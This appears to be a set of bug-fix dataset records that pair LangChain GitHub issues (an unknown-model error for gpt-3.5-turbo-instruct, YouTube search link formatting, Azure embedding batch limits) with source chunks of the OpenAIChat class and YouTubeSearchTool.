Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | return {
**{"deployment_name": self.deployment_name},
**super()._identifying_params,
}
@property
def _invocation_params(self) -> Dict[str, Any]:
openai_params = {
"engine": self.deployment_name,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
}
return {**openai_params, **super()._invocation_params}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "azure"
class OpenAIChat(BaseLLM):
"""OpenAI Chat large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import OpenAIChat
openaichat = OpenAIChat(model_name="gpt-3.5-turbo")
"""
client: Any
model_name: str = "gpt-3.5-turbo"
"""Model name to use.""" |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
openai_api_key: Optional[str] = None
openai_api_base: Optional[str] = None
openai_proxy: Optional[str] = None
max_retries: int = 6
"""Maximum number of retries to make when generating."""
prefix_messages: List = Field(default_factory=list)
"""Series of messages for Chat input."""
streaming: bool = False
"""Whether to stream the results or not."""
allowed_special: Union[Literal["all"], AbstractSet[str]] = set()
"""Set of special tokens that are allowed。"""
disallowed_special: Union[Literal["all"], Collection[str]] = "all"
"""Set of special tokens that are not allowed。"""
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = {field.alias for field in cls.__fields__.values()}
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name not in all_required_field_names:
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
extra[field_name] = values.pop(field_name)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Validate that api key and python package exists in environment."""
openai_api_key = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
openai_api_base = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
openai_proxy = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
openai_organization = get_from_dict_or_env(
values, "openai_organization", "OPENAI_ORGANIZATION", default=""
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | try:
import openai
openai.api_key = openai_api_key
if openai_api_base:
openai.api_base = openai_api_base
if openai_organization:
openai.organization = openai_organization
if openai_proxy:
openai.proxy = {"http": openai_proxy, "https": openai_proxy} # ty
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
try:
values["client"] = openai.ChatCompletion
except AttributeError:
raise ValueError(
"`openai` has no `ChatCompletion` attribute, this is likely "
"due to an old version of the openai package. Try upgrading it "
"with `pip install --upgrade openai`."
)
warnings.warn(
"You are trying to use a chat model. This way of initializing it is "
"no longer supported. Instead, please use: "
"`from langchain.chat_models import ChatOpenAI`"
)
return values
@property
def _default_params(self) -> Dict[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Get the default parameters for calling OpenAI API."""
return self.model_kwargs
def _get_chat_params(
self, prompts: List[str], stop: Optional[List[str]] = None
) -> Tuple:
if len(prompts) > 1:
raise ValueError(
f"OpenAIChat currently only supports single prompt, got {prompts}"
)
messages = self.prefix_messages + [{"role": "user", "content": prompts[0]}]
params: Dict[str, Any] = {**{"model": self.model_name}, **self._default_params}
if stop is not None:
if "stop" in params:
raise ValueError("`stop` found in both the input and default params.")
params["stop"] = stop
if params.get("max_tokens") == -1:
# for Ch
del params["max_tokens"]
return messages, params
def _stream( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
messages, params = self._get_chat_params([prompt], stop)
params = {**params, **kwargs, "stream": True}
for stream_resp in completion_with_retry(
self, messages=messages, run_manager=run_manager, **params
):
token = stream_resp["choices"][0]["delta"].get("content", "")
chunk = GenerationChunk(text=token)
yield chunk
if run_manager:
run_manager.on_llm_new_token(token, chunk=chunk)
async def _astream( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> AsyncIterator[GenerationChunk]:
messages, params = self._get_chat_params([prompt], stop)
params = {**params, **kwargs, "stream": True}
async for stream_resp in await acompletion_with_retry(
self, messages=messages, run_manager=run_manager, **params
):
token = stream_resp["choices"][0]["delta"].get("content", "")
chunk = GenerationChunk(text=token)
yield chunk
if run_manager:
await run_manager.on_llm_new_token(token, chunk=chunk)
def _generate( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
if self.streaming:
generation: Optional[GenerationChunk] = None
for chunk in self._stream(prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
return LLMResult(generations=[[generation]])
messages, params = self._get_chat_params(prompts, stop)
params = {**params, **kwargs}
full_response = completion_with_retry(
self, messages=messages, run_manager=run_manager, **params
)
llm_output = {
"token_usage": full_response["usage"],
"model_name": self.model_name,
}
return LLMResult(
generations=[
[Generation(text=full_response["choices"][0]["message"]["content"])]
],
llm_output=llm_output, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | )
async def _agenerate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
if self.streaming:
generation: Optional[GenerationChunk] = None
async for chunk in self._astream(prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
return LLMResult(generations=[[generation]])
messages, params = self._get_chat_params(prompts, stop)
params = {**params, **kwargs}
full_response = await acompletion_with_retry(
self, messages=messages, run_manager=run_manager, **params
)
llm_output = {
"token_usage": full_response["usage"],
"model_name": self.model_name,
}
return LLMResult(
generations=[
[Generation(text=full_response["choices"][0]["message"]["content"])]
], |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | llm_output=llm_output,
)
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "openai-chat"
def get_token_ids(self, text: str) -> List[int]:
"""Get the token IDs using the tiktoken package."""
# ti
if sys.version_info[1] < 8:
return super().get_token_ids(text)
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to calculate get_num_tokens. "
"Please install it with `pip install tiktoken`."
)
enc = tiktoken.encoding_for_model(self.model_name)
return enc.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,742 | Update return parameter of YouTubeSearchTool | ### Feature request
Return the Youtube video links in full format like `https://www.youtube.com/watch?v=VIDEO_ID`
Currently the links are like `/watch?v=VIDEO_ID`
Return the links as List like `['link1, 'link2']`
Currently it is returning the whole list as string ` "['link1, 'link2']" `
### Motivation
If the links returned are exact same as **direct links to youtube in a list** rather than a string, i can avoid the hustle and bustle of processing it agian to convert to the required format
### Your contribution
I will change the code a bit and pull it. | https://github.com/langchain-ai/langchain/issues/10742 | https://github.com/langchain-ai/langchain/pull/10743 | 1dae3c383ed17b0a2e4675accf396bc73834de75 | 740eafe41da7317f42387bdfe6d0f1f521f2cafd | "2023-09-18T17:47:53Z" | python | "2023-09-20T00:04:06Z" | libs/langchain/langchain/tools/youtube/search.py | """
Adapted from https://github.com/venuv/langchain_yt_tools
CustomYTSearchTool searches YouTube videos related to a person
and returns a specified number of video URLs.
Input to this tool should be a comma separated list,
- the first part contains a person name
- and the second(optional) a number that is the
maximum number of video results to return
"""
import json
from typing import Optional
from langchain.callbacks.manager import CallbackManagerForToolRun
from langchain.tools import BaseTool
class YouTubeSearchTool(BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,742 | Update return parameter of YouTubeSearchTool | ### Feature request
Return the Youtube video links in full format like `https://www.youtube.com/watch?v=VIDEO_ID`
Currently the links are like `/watch?v=VIDEO_ID`
Return the links as List like `['link1, 'link2']`
Currently it is returning the whole list as string ` "['link1, 'link2']" `
### Motivation
If the links returned are exact same as **direct links to youtube in a list** rather than a string, i can avoid the hustle and bustle of processing it agian to convert to the required format
### Your contribution
I will change the code a bit and pull it. | https://github.com/langchain-ai/langchain/issues/10742 | https://github.com/langchain-ai/langchain/pull/10743 | 1dae3c383ed17b0a2e4675accf396bc73834de75 | 740eafe41da7317f42387bdfe6d0f1f521f2cafd | "2023-09-18T17:47:53Z" | python | "2023-09-20T00:04:06Z" | libs/langchain/langchain/tools/youtube/search.py | """Tool that queries YouTube."""
name: str = "youtube_search"
description: str = (
"search for youtube videos associated with a person. "
"the input to this tool should be a comma separated list, "
"the first part contains a person name and the second a "
"number that is the maximum number of video results "
"to return aka num_results. the second part is optional"
)
def _search(self, person: str, num_results: int) -> str:
from youtube_search import YoutubeSearch
results = YoutubeSearch(person, num_results).to_json()
data = json.loads(results)
url_suffix_list = [video["url_suffix"] for video in data["videos"]]
return str(url_suffix_list)
def _run(
self,
query: str,
run_manager: Optional[CallbackManagerForToolRun] = None,
) -> str:
"""Use the tool."""
values = query.split(",")
person = values[0]
if len(values) > 1:
num_results = int(values[1])
else:
num_results = 2
return self._search(person, num_results) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
